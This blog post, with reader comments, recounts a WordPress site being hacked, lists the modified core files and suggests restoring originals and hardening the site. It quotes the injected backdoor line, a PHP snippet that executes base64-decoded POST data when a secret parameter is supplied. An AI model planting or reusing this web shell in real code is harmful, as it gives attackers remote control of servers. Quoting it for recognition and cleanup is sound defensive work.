Got Hacked Again

Posted on by Dexter Panganiban

Last January WordPress.net.in has injected codes at my WordPress files in which the following WordPress files has been injected with numbers for SQL

  • wp-admin/admin.php
  • wp-admin/index.php
  • wp-includes/wp-db.php
  • wp-includes/pluggable.php
  • wp-includes/gettext.php
  • wp-includes/default-filters.php

Then again. My site has been hacked, but at this time, it is not completely hacked since I was able to check some wordpress files that has been altered. It can easily be notice if you are using Windows Live Writer. If you are using Windows Live writer and suddenly you encounter ” blog server error-server error-32700 occurred parse error, not well formed

I saw some string like as follows :

<?php if($_GET[‘aee8d2759ea2c769’]==”e7d557fe37ae8fd6″){ eval(base64_decode($_POST[‘file’])); exit; } ?>

This string should not be installed on either of the WordPress files mentioned above and needs to be deleted. The easiest method of fixing this one is to replace above mentioned files by the original installation files of WordPress that could be downloaded at their site. It is good that I gave a local copy of those files in my computer. Because that the hacked might happen again.

Again I thank gordon.dewis.ca for his post regarding this matter. further reading result good information from Other site

My main index.php was not yet hacked. I believed the hacking is not yet completed. The next time you see an error from your windows live writer. Check your WordPress Installation files.

I have made To do checklist.

  1. I need to install .htaccess password , maybe somebody would like to make post in doing so 🙂 or I will just have to search via Google.
  2. Research for more possible security fix for my blog.
  3. Need to update my plug-ins 🙂

It is good that I am using Windows Live Writer. So next time when your Authoring Tools make some problem try to search immediately at Google the problem that it reports. BTW I need to study this article on wordpress codex.

Avatar for Dexter Panganiban
Dexter Panganiban https://techathand.net/about-2/

Dexter is a person who loves technology,new gadget, SEO, Social Media and Christianity. Follow him at twitter via @techathand and add him @ Google+ and contact us at admin@techathand.net

You May Also Like

More From Author

12Comments

Add yours
  1. 1
    Fibonacci
    Reply

    The only thing to avoid getting hacked is to start cleaning your computer’s system because it might be infected with a key-logger virus. This is a type of virus that can record everything that you are typing on your keyboard and automatically sent them to the hacker. There are other more types of virus that can caused you to be hacked so you better have the best anti-virus installed on your computer and keep them actively running on the background.

  5. 6
    V_RocKs
    Reply

    This is crap!

    I have both 2.3.3 and 2.0.11 blogs and they are all getting hacked in this manner.

    This has been going on since October 2007 and there have been various new releases since then without this problem being addressed and no input from the authors of wordpress!

    That is just bad news all around…

  9. 10
    snoob
    Reply

    remember to chmod the files that you need protected.

    snoob’s last blog post..?I really want to earn money online, what should I do??

  11. 12
    KarloPinoyBlogero
    Reply

    You know what, I think the reason why your blog is hacked often is because you disclose the plugins that you use on your blog. WordPress plugins are the ones that makes a blog vulnerable to attacks.

    I’m guessing that hackers just searched for a wordpress plugin that has some security issues and landed on your blog.

    KarloPinoyBlogero’s last blog post..A Pinoy Term for the Word ‘Blog’?

+ Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.